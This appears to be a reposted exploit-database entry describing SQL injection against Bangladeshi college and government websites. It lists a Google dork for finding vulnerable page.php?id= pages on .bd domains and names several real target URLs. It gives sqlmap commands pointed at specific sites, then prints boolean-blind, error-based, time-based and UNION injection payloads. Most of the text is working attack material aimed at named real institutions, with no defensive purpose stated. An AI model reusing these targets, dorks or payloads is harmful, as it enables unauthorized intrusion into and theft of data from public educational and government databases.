Technical Assistance explore IT Bangladesh Web site:bd SQL Injection Test BackBox GNU/Linux


Information Exploit

[+] Exploit Title : Bangladesh Web site:bd SQL Injection
[+] Author : Bl4ck M4n
[+] Vendor Home: http://exploreit.com.bd/ Technical Assistance explore IT
[+] Dork : inurl:"page.php?id=" site:bd
[+] Tested on : BackBox 5.1, Chrome

On Target :
- http://www.rangamaticollege.gov.bd/page.php?id=11
- http://mirpurcollege.edu.bd/page.php?id=8
- http://gsacollege.edu.bd/page.php?id=27
- http://laxmipurgovtcollege.edu.bd/page.php?id=3

[+] Poc SQL :
- sqlmap -u "http://laxmipurgovtcollege.edu.bd/page.php?id=3" --dbs
- sqlmap -u "http://www.gdc.gov.bd/page.php?id=2" --dbs

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=10' AND 2605=2605 AND 'cgRU'='cgRU

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
(FLOOR)
    Payload: id=10' AND (SELECT 6597 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(6597=6597,1))),0x716b7a7071,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'iBFB'='iBFB

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=10' AND SLEEP(5) AND 'NnlV'='NnlV

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=10' UNION ALL SELECT
NULL,CONCAT(0x716b627a71,0x706e757375635a567877537a5472427650546a634f5050666174796d616347447a6455584b774264,0x716b7a7071),NULL,NULL,NULL,NULL-- IsIV

database


vulnerability


data user


Video tutorial


Sumber Exploit : [cxsecurity.com]
Previous
Next Post »